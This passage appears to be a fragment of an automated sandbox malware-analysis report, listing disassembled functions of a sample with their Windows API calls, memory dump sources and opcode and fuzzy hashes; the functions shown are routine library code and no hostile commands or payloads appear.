                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 232145b98d90157106934f2e5661b4869c24b95752d22682b23aa32a6d40f35d
                                                                                    • Instruction ID: 526fa82712b3f226a90ee53081e46f33d47885be35e769bffa52b45193ce1879
                                                                                    • Opcode Fuzzy Hash: 232145b98d90157106934f2e5661b4869c24b95752d22682b23aa32a6d40f35d
                                                                                    • Instruction Fuzzy Hash: E4F0B431605E246BDB216A228C85B6A377BEF51760F19C235F81D97695CFF0D84046E0
                                                                                    Function 001759FC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,001723AA,?,0000015D,?,?,?,?,00172F29,000000FF,00000000,?,?), ref: 00175A2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 1cea4779758f7a2509ba004f683e93b4950603f57bc886e3020f36e59733f0c1
                                                                                    • Instruction ID: 32618ccdfbadf8eb4d9b03098a39c1c7114a1dec03a82d281ab3dfd4f017a383
                                                                                    • Opcode Fuzzy Hash: 1cea4779758f7a2509ba004f683e93b4950603f57bc886e3020f36e59733f0c1
                                                                                    • Instruction Fuzzy Hash: 38E0E531104A306BEB3126658C8175A367BAF613A4F05C334AC0D97192CFF0CC0041E5
                                                                                    Function 00155B35 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00155B3A
                                                                                      • Part of subcall function 0015AC66: __EH_prolog.LIBCMT ref: 0015AC6B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: b7c81fc43d54b5a5721104092d4ef38a68a9a002bbbf810ebaf68fcf77775aa2
                                                                                    • Instruction ID: 0317a0af3d472db1c3f8b7224fcf8797437f0f1ad6bb61c2e008cc6e31dc16c6
                                                                                    • Opcode Fuzzy Hash: b7c81fc43d54b5a5721104092d4ef38a68a9a002bbbf810ebaf68fcf77775aa2
                                                                                    • Instruction Fuzzy Hash: 7B018130944A85DACB04E7A8C4997EDF7E49F66305F00819DEC6A57282DBB42B0DD7A3
                                                                                    Function 0015A145 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0015A174
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 1863332320-0
                                                                                    • Opcode ID: f7a5059013f82b073afbc913a60f8da994cd893f9dba742e09e76e89e0cadb5c
                                                                                    • Instruction ID: 93659a469975b6cea30f52ba6de2fa0ea3e00cd22b7b9c52a4363fa15e0c8288
                                                                                    • Opcode Fuzzy Hash: f7a5059013f82b073afbc913a60f8da994cd893f9dba742e09e76e89e0cadb5c
                                                                                    • Instruction Fuzzy Hash: F1F0E231408780EECE225BB48845BCBBB909F2A333F048B09F9FD1A192C375108D8B23
                                                                                    Function 00151E8E Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151E93
                                                                                      • Part of subcall function 001518F6: __EH_prolog.LIBCMT ref: 001518FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 6204f281dacc9b3852b2175d63fe1bc389c964efd3746207c36eabd0ab60c709
                                                                                    • Instruction ID: 5536d6e1ca4e89e9ad6dcf1ac0555f200c82fd0d9f9c509465d1065bdd3b9a4e
                                                                                    • Opcode Fuzzy Hash: 6204f281dacc9b3852b2175d63fe1bc389c964efd3746207c36eabd0ab60c709
                                                                                    • Instruction Fuzzy Hash: 92F0D4B1D002899ECF42DFA8C8057EEBBB0AB18200F0442BAD829E7202E7344604CB91
                                                                                    Function 00151E93 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151E93
                                                                                      • Part of subcall function 001518F6: __EH_prolog.LIBCMT ref: 001518FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                    • Instruction ID: e3a5efb734388333850bec156f215b4eed9b2d8fc7b5a5fc677dd5bd37bb27fe
                                                                                    • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                    • Instruction Fuzzy Hash: C8F092B1C01299DECF52DFA8C8457EEBBF1BB19200F1442BAD819E7202E7395618CB91
                                                                                    Function 0015F8F2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 0015F927
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExecutionStateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2211380416-0
                                                                                    • Opcode ID: 2f9942d59ae99c5a3837a1850b9327e207a2470b47dbeb36bf89601ace076b70
                                                                                    • Instruction ID: d48ac2b013c47339077feee00a110db21109d77545d175537f4863e7b3da4b44
                                                                                    • Opcode Fuzzy Hash: 2f9942d59ae99c5a3837a1850b9327e207a2470b47dbeb36bf89601ace076b70
                                                                                    • Instruction Fuzzy Hash: DED02B6134091162E6123328ED06BFE15074FCA356F08003DB8146F6D38B6508BFD3F1
                                                                                    Function 00168B65 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00168B6B
                                                                                      • Part of subcall function 00168924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00168945
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                    • String ID:
                                                                                    • API String ID: 1915507550-0
                                                                                    • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                    • Instruction ID: 58a70e9859538b9034ecc846e3b1d3cc8b706cd87d317d8ae9d6dbbfe371cfb5
                                                                                    • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                    • Instruction Fuzzy Hash: 0DD0A7B062010C7FDF506E608C0297D7AD8DB11350F008236BC0495150EF72CD3066A1
                                                                                    Function 0015971A Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileType.KERNELBASE(000000FF,0015964C), ref: 00159726
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    • Opcode ID: 995a37d5f65e0e30e371ba95a6582a9a853a2577a7afbec3c810d937f541adb7
                                                                                    • Instruction ID: 97a8488c3d0ab113fba8b687ee50240bfde6784adc53c390f592a418e1bef0c5
                                                                                    • Opcode Fuzzy Hash: 995a37d5f65e0e30e371ba95a6582a9a853a2577a7afbec3c810d937f541adb7
                                                                                    • Instruction Fuzzy Hash: 15D01230031200D68E620E385D0A0667751DB473E7B28DAE5E475C80A1C722C84BFA42
                                                                                    Function 0016BF77 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0016BF9C
                                                                                      • Part of subcall function 0016991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0016992F
                                                                                      • Part of subcall function 0016991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00169940
                                                                                      • Part of subcall function 0016991E: TranslateMessage.USER32(?), ref: 0016994A
                                                                                      • Part of subcall function 0016991E: DispatchMessageW.USER32(?), ref: 00169954
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchItemPeekSendTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4142818094-0
                                                                                    • Opcode ID: bc2240530cd420dc531209f7ffd9aadb0172d389679b2c380ede014390415a7f
                                                                                    • Instruction ID: a8ae2d8933695bad632d115473c744322461a65cb998b4f5c78a2d0e82227931
                                                                                    • Opcode Fuzzy Hash: bc2240530cd420dc531209f7ffd9aadb0172d389679b2c380ede014390415a7f
                                                                                    • Instruction Fuzzy Hash: DED09E71154200FBD6112B51CD06F1A7AE7BB98B05F404559B644344B18672DE70AB02
                                                                                    Function 0016C726 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 046aeb1c4afb4a303fe95110f482bb116444543ccdb5502ba8b61764a3c06a27
                                                                                    • Instruction ID: 1805212182283d94977d5fafabc82ee69996810bf45bb0a5581a8227432585ad
                                                                                    • Opcode Fuzzy Hash: 046aeb1c4afb4a303fe95110f482bb116444543ccdb5502ba8b61764a3c06a27
                                                                                    • Instruction Fuzzy Hash: E4B012A12A82057D354CB1805E43C37010CC6D0B20370451FB440E5040FB405E50CF72
                                                                                    Function 0016C75F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 6eabafb0a497199012c1212ae909213abde8092120f555847f972c0ae108ff06
                                                                                    • Instruction ID: 67999ff859d5d47e83fc1876b9710768617c5ee03df33ef0e87f953071444e51
                                                                                    • Opcode Fuzzy Hash: 6eabafb0a497199012c1212ae909213abde8092120f555847f972c0ae108ff06
                                                                                    • Instruction Fuzzy Hash: E4B012912A82056E318CF1446F03C37010CC6C0F10370441FB444D2140FB404E118F72
                                                                                    Function 0016C741 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 63e301fcbe7de9624f8fa56d561f21bd79ef0f905dcbc7a94ddda8c0f3fe8058
                                                                                    • Instruction ID: b1d0af9be0c566decd956b7b6f10ee6d335deadfaa1fadc0622ad8ceaf69b933
                                                                                    • Opcode Fuzzy Hash: 63e301fcbe7de9624f8fa56d561f21bd79ef0f905dcbc7a94ddda8c0f3fe8058
                                                                                    • Instruction Fuzzy Hash: 55B012912B80056D318CF1449E03C37050CC6C0B10370451FB486D2140FB400D108B72
                                                                                    Function 0016C74B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: bb62f97f4987aba910a439eab4101950bd84c28f3733544f97a97c6d96d81587
                                                                                    • Instruction ID: 3c252828291c3c69870301a1ff9fe04fc79c30f8b540b058fa66ef966f931188
                                                                                    • Opcode Fuzzy Hash: bb62f97f4987aba910a439eab4101950bd84c28f3733544f97a97c6d96d81587
                                                                                    • Instruction Fuzzy Hash: 42B012912B81056D318CF5445E03C37010CC6C0B10370841FB844D2140FB404E108F72
                                                                                    Function 0016C787 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: c54a381d7e2eecbce9ecee3951d4df87962e86c5765067c0fea55d9fe0aa21dc
                                                                                    • Instruction ID: 7013176ef323158280ece3887c07aab7f270cbecba6f6d40ac58780b6216205f
                                                                                    • Opcode Fuzzy Hash: c54a381d7e2eecbce9ecee3951d4df87962e86c5765067c0fea55d9fe0aa21dc
                                                                                    • Instruction Fuzzy Hash: A9B012912981017E3148B1405D42C37110EC7C1B10370C41FB8C0E1040FB804D648972
                                                                                    Function 0016C7B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: ff3ba188d0b6a2492ba072eecba5ba9751821878a75f484c9e4129515ae11fa0
                                                                                    • Instruction ID: 353cb9404bfa72626065f24660d83bc5124ee87f2778157f1d745aa65838e47f
                                                                                    • Opcode Fuzzy Hash: ff3ba188d0b6a2492ba072eecba5ba9751821878a75f484c9e4129515ae11fa0
                                                                                    • Instruction Fuzzy Hash: D3B012912981056E7148F1455D02C37110DC7C0B10370841FB480D1140FB804D608B76
                                                                                    Function 0016C7C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
